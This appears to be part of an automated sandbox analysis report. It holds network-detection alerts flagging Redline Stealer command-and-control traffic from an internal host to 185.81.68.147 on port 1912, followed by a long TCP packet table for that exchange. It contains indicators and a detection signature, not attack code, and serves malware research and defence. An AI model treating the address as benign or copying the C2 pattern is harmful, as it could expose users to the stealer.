                                                                                                                                                                                                                                2024-12-16T10:43:04.633490+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049729185.81.68.1471912TCP
                                                                                                                                                                                                                                2024-12-16T10:43:05.893540+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049729185.81.68.1471912TCP
                                                                                                                                                                                                                                2024-12-16T10:43:06.458897+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049729185.81.68.1471912TCP
                                                                                                                                                                                                                                2024-12-16T10:43:06.898848+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049729185.81.68.1471912TCP
                                                                                                                                                                                                                                2024-12-16T10:43:07.344742+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049729185.81.68.1471912TCP
                                                                                                                                                                                                                                2024-12-16T10:43:07.783126+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049729185.81.68.1471912TCP
                                                                                                                                                                                                                                2024-12-16T10:43:08.262092+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049729185.81.68.1471912TCP
                                                                                                                                                                                                                                2024-12-16T10:43:08.305702+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049729185.81.68.1471912TCP
                                                                                                                                                                                                                                2024-12-16T10:43:08.773149+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049729185.81.68.1471912TCP
                                                                                                                                                                                                                                2024-12-16T10:43:09.425876+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049729185.81.68.1471912TCP
                                                                                                                                                                                                                                2024-12-16T10:43:09.546043+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049729185.81.68.1471912TCP
                                                                                                                                                                                                                                2024-12-16T10:43:10.921766+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049729185.81.68.1471912TCP
                                                                                                                                                                                                                                2024-12-16T10:43:11.357051+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049729185.81.68.1471912TCP
                                                                                                                                                                                                                                2024-12-16T10:43:11.884559+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1049729185.81.68.1471912TCP

                                                                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                                                                TCP Packets

                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                Dec 16, 2024 10:42:43.856174946 CET4970880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:43.975857973 CET8049708185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:43.976079941 CET4970880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:43.976188898 CET4970880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:44.095889091 CET8049708185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:45.302553892 CET8049708185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:45.302643061 CET8049708185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:45.303083897 CET4970880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:45.318955898 CET4970880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:45.319283009 CET4971080192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:45.438688993 CET8049708185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:45.439012051 CET8049710185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:45.439363003 CET4971080192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:45.442727089 CET4971080192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:45.562604904 CET8049710185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:45.562746048 CET4971080192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:45.682531118 CET8049710185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:47.035459042 CET8049710185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:47.035583019 CET8049710185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:47.035734892 CET4971080192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:47.037137032 CET4971080192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:47.037350893 CET4971180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:47.156790018 CET8049710185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:47.157213926 CET8049711185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:47.158353090 CET4971180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:47.158353090 CET4971180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:47.278114080 CET8049711185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:47.278316975 CET4971180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:47.397964001 CET8049711185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:48.598004103 CET8049711185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:48.598021030 CET8049711185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:48.598653078 CET4971180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:48.599996090 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:48.604840994 CET4971180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:48.719702005 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:48.719769955 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:48.719851017 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:48.728864908 CET8049711185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:48.839545012 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.047136068 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.047302008 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.047343969 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.047359943 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.047370911 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.047396898 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.047454119 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.047461033 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.047473907 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.047487020 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.047512054 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.047569036 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.047667980 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.047681093 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.047734976 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.167165041 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.167278051 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.167339087 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.171365023 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.215286970 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.239377022 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.239397049 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.239469051 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.243268013 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.243383884 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.243436098 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.251710892 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.251765966 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.252007008 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.260128975 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.260271072 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.260344982 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.268482924 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.268585920 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.268799067 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.276921034 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.276983976 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.277061939 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.285248995 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.285341024 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.285406113 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.293697119 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.293792009 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.294023991 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.302056074 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.302539110 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.302630901 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.310473919 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.310503006 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.310633898 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.335156918 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.335288048 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.335345030 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.359227896 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.359474897 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.359532118 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.431813002 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.431962967 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.432030916 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.434514046 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.434730053 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.434954882 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.438920021 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.438988924 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.439076900 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.443389893 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.443527937 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.443691969 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.448098898 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.448221922 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.448337078 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.452989101 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.453128099 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.453200102 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.457642078 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.457786083 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.457843065 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.462543011 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.462560892 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.462750912 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.467325926 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.467340946 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.467444897 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.472219944 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.472233057 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.472342968 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.476751089 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.477174044 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.477222919 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.481543064 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.481626987 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.481705904 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.486501932 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.486574888 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.486653090 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.491139889 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.491239071 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.491338968 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.494893074 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.495090961 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.495132923 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.498752117 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.498970032 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.499124050 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.502567053 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.502752066 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.502823114 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.506371021 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.506500006 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.506603956 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.510334015 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.510581017 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.510724068 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.514017105 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.514210939 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.514281988 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.517926931 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.517990112 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.518094063 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.521753073 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.521765947 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.521847963 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.551899910 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.552042961 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.552320004 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.553981066 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.553992987 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.554128885 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.623804092 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.623819113 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.624022961 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.625175953 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.625423908 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.627115965 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.628113985 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.628223896 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.631129980 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.631196022 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.631222010 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.631405115 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.634247065 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.634258986 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.634326935 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.636944056 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.637022018 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.637072086 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.639672041 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.639766932 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.639858961 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.642441034 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.642510891 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.642967939 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.645175934 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.645343065 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.647212982 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.647800922 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.647887945 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.650438070 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.650449991 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.650490046 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.650540113 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.652909040 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.653017044 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.653115988 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.655648947 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.655688047 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.655772924 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.658180952 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.658324003 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.658961058 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.660686970 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.660761118 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.662974119 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.663300037 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.663326979 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.665860891 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.665873051 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.665901899 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.666019917 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.668467045 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.668479919 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.668570042 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.670977116 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.671138048 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.671267033 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.673696041 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.673708916 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.675287962 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.676165104 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.676258087 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.678747892 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.678787947 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.678837061 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.678924084 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.680855989 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.680869102 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.680970907 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.682534933 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.682547092 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.682631969 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.684396029 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.684488058 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.684544086 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.686332941 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.686451912 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.686544895 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.688081980 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.688195944 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.688262939 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.689963102 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.690277100 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.690323114 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.691814899 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.691951990 CET8049717185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.691987038 CET4971780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.693720102 CET8049717185.81.68.147192.168.2.10
